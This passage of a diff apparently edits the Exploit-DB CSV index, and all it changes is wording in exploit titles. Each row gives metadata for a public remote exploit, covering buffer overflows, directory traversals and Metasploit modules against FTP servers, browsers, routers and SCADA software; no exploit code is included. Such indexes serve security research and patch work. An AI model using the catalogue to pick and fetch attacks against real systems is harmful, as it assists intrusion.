Forgery",2009-01-25,spdr,remote,hardware, 7868,exploits/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite",2009-01-26,Houssamix,remote,windows, 7871,exploits/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation",2009-01-26,Stack,remote,windows, -7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21 +7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21 7903,exploits/windows/remote/7903.html,"Google Chrome 1.0.154.43 - Clickjacking",2009-01-28,x0x,remote,windows, 7910,exploits/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",remote,windows, 7912,exploits/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,remote,windows, @@ -10954,8 +10954,8 @@ id,file,description,date,author,type,platform,port 8256,exploits/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Expoit",2009-03-23,"Jonathan Salwan",remote,windows, 8257,exploits/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,remote,windows, 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware, -8273,exploits/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-23,"Jonathan Salwan",remote,windows, -8283,exploits/windows/remote/8283.c,"Femitter FTP Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-24,"Jonathan Salwan",remote,windows, +8273,exploits/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",remote,windows, +8283,exploits/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",remote,windows, 8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows, 8295,exploits/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,remote,windows,22 8316,exploits/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,remote,hardware, @@ -11028,7 +11028,7 @@ id,file,description,date,author,type,platform,port 8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows, 9002,exploits/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM",2009-06-22,mu-b,remote,windows,19810 9031,exploits/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,remote,windows,19810 -9039,exploits/multiple/remote/9039.txt,"cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple, +9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple, 9065,exploits/windows/remote/9065.c,"Green Dam - Remote Change System Time",2009-07-01,"Anti GD",remote,windows, 9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware, 9093,exploits/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,remote,windows, @@ -11051,7 +11051,7 @@ id,file,description,date,author,type,platform,port 9330,exploits/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,remote,windows, 9422,exploits/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,remote,hardware, 9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware, -9443,exploits/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,remote,windows, +9443,exploits/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' (Authenticated) Directory Traversal",2009-08-18,DSecRG,remote,windows, 9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware, 9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware, @@ -11197,7 +11197,7 @@ id,file,description,date,author,type,platform,port 10365,exploits/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,remote,windows, 10375,exploits/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,remote,windows, 10380,exploits/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz & sp3x",remote,windows, -10394,exploits/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r & muts",remote,windows,80 +10394,exploits/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Remote Buffer Overflow",2009-12-12,"sinn3r & muts",remote,windows,80 10434,exploits/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,remote,windows,80 10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware, 10510,exploits/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",remote,hardware, @@ -11211,7 +11211,7 @@ id,file,description,date,author,type,platform,port 10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,remote,windows, 10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows, 10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux, -11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell, +11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell, 11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows, 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows, 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows, @@ -11228,11 +11228,11 @@ id,file,description,date,author,type,platform,port 11272,exploits/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,remote,windows, 11293,exploits/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,remote,windows, 11328,exploits/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,remote,windows, -11420,exploits/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow",2010-02-12,Lincoln,remote,windows, +11420,exploits/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Remote Overflow",2010-02-12,Lincoln,remote,windows, 11422,exploits/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,remote,windows, 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows, 11457,exploits/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add)",2010-02-15,"Sioma Labs",remote,windows, -11468,exploits/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,remote,windows,21 +11468,exploits/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - (Authenticated) Buffer Overflow (1)",2010-02-15,dookie,remote,windows,21 11497,exploits/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",remote,linux, 11500,exploits/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - 'HTTP' Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",remote,windows, 11539,exploits/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,remote,windows, @@ -11245,22 +11245,22 @@ id,file,description,date,author,type,platform,port 11683,exploits/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free (Metasploit)",2010-03-10,Trancer,remote,windows, 11694,exploits/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",remote,windows, 11720,exploits/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",remote,linux, -11742,exploits/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,remote,windows, +11742,exploits/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Buffer Overflow (Metasploit)",2010-03-15,blake,remote,windows, 11750,exploits/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,remote,windows, 11765,exploits/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,remote,windows,21 11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple, -11820,exploits/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,remote,windows, +11820,exploits/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - (Authenticated) Multiple Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,remote,windows, 11822,exploits/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,remote,hardware, 11856,exploits/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",remote,multiple, 11857,exploits/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow",2010-03-23,"Salvatore Fresta",remote,windows, -11877,exploits/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2)",2010-03-25,sud0,remote,windows,21 +11877,exploits/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - (Authenticated) Multiple Stack Buffer Overflows (2)",2010-03-25,sud0,remote,windows,21 11879,exploits/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",remote,windows, 11886,exploits/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",remote,windows, 11973,exploits/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,remote,windows, 11974,exploits/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow",2010-03-30,"S2 Crew",remote,windows, 11986,exploits/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",remote,linux, 12033,exploits/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,cp77fk4r,remote,multiple, -12044,exploits/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow",2010-04-04,x90c,remote,windows, +12044,exploits/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - 'MKD' (Authenticated) Remote Buffer Overflow",2010-04-04,x90c,remote,windows, 12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple, 12117,exploits/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",remote,windows, 12119,exploits/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,remote,windows, @@ -11275,7 +11275,7 @@ id,file,description,date,author,type,platform,port 12250,exploits/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal",2010-04-15,dookie,remote,windows, 12263,exploits/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution)",2010-04-16,"Lucas Apa",remote,multiple, 12264,exploits/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator",2010-04-16,"Lucas Apa",remote,multiple, -12265,exploits/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,remote,hardware, +12265,exploits/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - File-system Access",2010-04-16,fizix610,remote,hardware, 12298,exploits/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,remote,hardware, 12304,exploits/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,remote,multiple, 12308,exploits/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,remote,windows, @@ -11290,7 +11290,7 @@ id,file,description,date,author,type,platform,port 12380,exploits/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,remote,windows, 12417,exploits/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,remote,windows, 12480,exploits/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",remote,windows, -12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - Authenticated Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows, +12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows, 12498,exploits/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,remote,windows, 12511,exploits/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,remote,windows, 12512,exploits/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,remote,windows, @@ -11308,7 +11308,7 @@ id,file,description,date,author,type,platform,port 12815,exploits/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,remote,windows, 12834,exploits/windows/remote/12834.py,"XFTP 3.0 Build 0239 - 'Filename' Remote Buffer Overflow",2010-06-01,sinn3r,remote,windows, 12865,exploits/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",remote,hardware, -40091,exploits/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",remote,php,80 +40091,exploits/php/remote/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",2016-07-11,"Mehmet Ince",remote,php,80 13588,exploits/multiple/remote/13588.pl,"2^6 TCP Control Bit - Fuzzer (No ECN or CWR)",2010-01-11,ShadowHatesYou,remote,multiple, 13735,exploits/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow",2010-06-05,d1dn0t,remote,osx,8080 13787,exploits/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware",2010-06-09,anonymous,remote,multiple, @@ -11344,17 +11344,17 @@ id,file,description,date,author,type,platform,port 14386,exploits/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, 14387,exploits/multiple/remote/14387.html,"Apple Safari 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, 14388,exploits/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, -14399,exploits/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, -14400,exploits/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, -14402,exploits/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow",2010-07-18,fdiskyou,remote,windows, +14399,exploits/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, +14400,exploits/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, +14402,exploits/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - 'CWD' (Authenticated) Remote Buffer Overflow",2010-07-18,fdiskyou,remote,windows, 14407,exploits/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",remote,aix, 14409,exploits/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,remote,aix, 14412,exploits/windows/remote/14412.rb,"Hero DVD - Remote Buffer Overflow (Metasploit)",2010-07-19,Madjix,remote,windows, 14416,exploits/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",remote,windows, 14447,exploits/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",remote,windows, -14451,exploits/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",remote,windows, +14451,exploits/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",remote,windows, 14456,exploits/aix/remote/14456.c,"IBM AIX 5l - 'FTPd' Remote DES Hash",2010-07-24,kingcope,remote,aix, -14496,exploits/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen & corelanc0d3r",remote,windows, +14496,exploits/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen & corelanc0d3r",remote,windows, 14489,exploits/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,remote,unix, 14492,exploits/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,remote,windows, 14505,exploits/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)",2010-07-30,loneferret,remote,windows, @@ -11373,7 +11373,7 @@ id,file,description,date,author,type,platform,port 14602,exploits/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,remote,multiple, 14605,exploits/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,remote,windows, 14604,exploits/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Remote Buffer Overflow",2010-08-10,"Rabih Mohsen",remote,windows, -14623,exploits/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",remote,windows,21 +14623,exploits/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",remote,windows,21 14658,exploits/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,remote,windows, 14641,exploits/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,anonymous,remote,multiple, 14674,exploits/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",remote,windows, @@ -11419,7 +11419,7 @@ id,file,description,date,author,type,platform,port 15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,remote,windows, 15337,exploits/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow",2010-10-27,blake,remote,windows, 15347,exploits/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Remote Buffer Overflow",2010-10-28,n00b,remote,windows, -15349,exploits/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,remote,windows, +15349,exploits/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - (Authenticated) Directory Traversal",2010-10-29,chr1x,remote,windows, 15352,exploits/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow",2010-10-29,anonymous,remote,windows, 15357,exploits/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",remote,windows, 15358,exploits/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",remote,windows, @@ -11483,9 +11483,9 @@ id,file,description,date,author,type,platform,port 16105,exploits/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,remote,windows, 16137,exploits/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",remote,multiple, 16145,exploits/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,remote,windows, -16149,exploits/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",remote,hardware, +16149,exploits/hardware/remote/16149.txt,"Linksys WAP610N - Root Access Security",2011-02-10,"Matteo Ignaccolo",remote,hardware, 16176,exploits/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,remote,windows, -16177,exploits/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,remote,windows, +16177,exploits/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,remote,windows, 16226,exploits/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,hardware, 16208,exploits/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, 16209,exploits/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, @@ -11528,11 +11528,11 @@ id,file,description,date,author,type,platform,port 16309,exploits/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)",2010-09-20,Metasploit,remote,multiple, 16310,exploits/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)",2010-09-20,Metasploit,remote,multiple, 16311,exploits/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,remote,linux, -16312,exploits/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16312,exploits/multiple/remote/16312.rb,"Axis2 - (Authenticated) Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple, 16314,exploits/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,remote,multiple, -16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple, 16316,exploits/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,remote,multiple, -16317,exploits/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16317,exploits/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit)",2010-12-14,Metasploit,remote,multiple, 16318,exploits/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,remote,multiple, 16319,exploits/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,remote,multiple, 16320,exploits/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,remote,unix, @@ -11588,7 +11588,7 @@ id,file,description,date,author,type,platform,port 16371,exploits/windows/remote/16371.rb,"Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,remote,windows, 16372,exploits/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,remote,windows, 16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows, -16374,exploits/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,remote,windows, +16374,exploits/windows/remote/16374.rb,"Microsoft Windows - (Authenticated) User Code Execution (Metasploit)",2010-12-02,Metasploit,remote,windows, 16375,exploits/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)",2010-08-25,Metasploit,remote,windows, 16376,exploits/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, 16377,exploits/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)",2010-07-25,Metasploit,remote,windows, @@ -11697,7 +11697,7 @@ id,file,description,date,author,type,platform,port 16483,exploits/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, 16484,exploits/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, 16485,exploits/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, -16486,exploits/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP Authenticate Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16486,exploits/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP (Authenticated) Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, 16487,exploits/windows/remote/16487.rb,"Ipswitch IMail Server - IMAP SEARCH Buffer Overflow 